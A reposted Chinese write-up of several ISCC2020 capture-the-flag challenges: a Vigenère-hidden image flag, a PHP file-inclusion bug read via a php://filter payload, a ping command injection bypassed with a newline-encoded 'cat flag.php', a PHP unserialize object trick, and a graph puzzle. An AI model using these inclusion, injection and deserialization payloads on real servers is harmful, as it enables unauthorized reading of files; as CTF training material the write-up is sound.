首页 > 编程入门 文章详情

ISCC2020部分wp

编程入门 行业动态 更新时间:2024-10-20 18:56:16

ISCC2020部分<a href=https://www.elefans.com/category/jswz/34/1767336.html style=wp"/>

ISCC2020部分wp

ISCC签到


下载附件,拖进winhex,修改图片高度

提交ISCC{D3tivtm_ zv_ Tq5I_Dygef},结果错误。应该进行了加密,尝试了栅栏密码和凯撒密码也不对,最后才知道是维吉尼亚加密。题目中的high应该就是key。

flag:ISCC{W3lcome_ to_ Mi5C_ Wryyy}

阿森的爱情-1

Where is file?-1

考察php伪协议

<?php
show_source(__FILE__);
echo $_GET['hello'];
$file=$_GET['file'];
while (strstr($file, "file://")) {$file=str_replace("file://", "", $file);
}
include($file);
?>

从给出的代码来看,参数名是file,并且过滤了file协议。使用伪协议(根据源码,不能使用file协议)读取flag内容:

Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

可以得到一串求字符串:
PD9waHAKJGE9ImZsYWd7d2ViX2luY2x1ZGVfZmlsZX0iOwo/Pgo=

Base64解密可得到:

<?php
$a="flag{web_include_file}";
?>

阿帅的爱情

<?php
if(!isset($_GET["ip"])){show_source(__file__);
} else
{$ip=$_GET["ip"];$pattern="/[;|&].*[a-zA-Z]+/";if(preg_match($pattern,$ip)!=0){die('bad domain');}try {$result = shell_exec('ping -c 4 ' . $ip);}catch(Exception $e) {$result = $e->getMessage();echo $result;}$result = str_replace("\n", "<br>", $result);echo $result;
}
?ip=%0als


http://101.201.126.95:7013/?ip=%0acat%20flag.php

?ip=%0acat flag.php

Php is the best language


打开下载的文件

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{public $file;function __toString()      {if(isset($this->file)){$filename = "./{$this->file}";if (base64_encode(file_get_contents($filename))){return base64_encode(file_get_contents($filename));}}}
}if (isset($_GET['data']))
{$data = $_GET['data'];$good = unserialize($data);echo $good;
}
else 
{$url='./index.php';
}$html='';
if(isset($_POST['test'])){$s = $_POST['test'];$html.="<p>谢谢参与!</p>";
}
?>

修改代码

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{public $file="flag.php";function __toString()      {if(isset($this->file)){$filename = "./{$this->file}";if (base64_encode(file_get_contents($filename))){return base64_encode(file_get_contents($filename));}}}
}$a = new baby;
echo serialize($a);
?>

运行上面的代码,可得到:

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}


这串字符串应该是Base64加密

ISCC成绩查询-1


下载得到一个PNG文件,使用Stegsolve,发现隐写以下内容


基本确定是一个哥尼斯堡七桥问题,观察到上图只有14、5号点是奇度数节点,所以是存在欧拉通路的半欧拉图。从两个奇度数点出发,找到符合图片顺序的欧拉通路。

连接后为:TRLNCHHAFCIEEIEEPR

flag{THERAILFENCECIPHER}

更多推荐

ISCC2020部分wp

本文发布于:2024-02-07 00:27:27,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1751891.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:wp

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表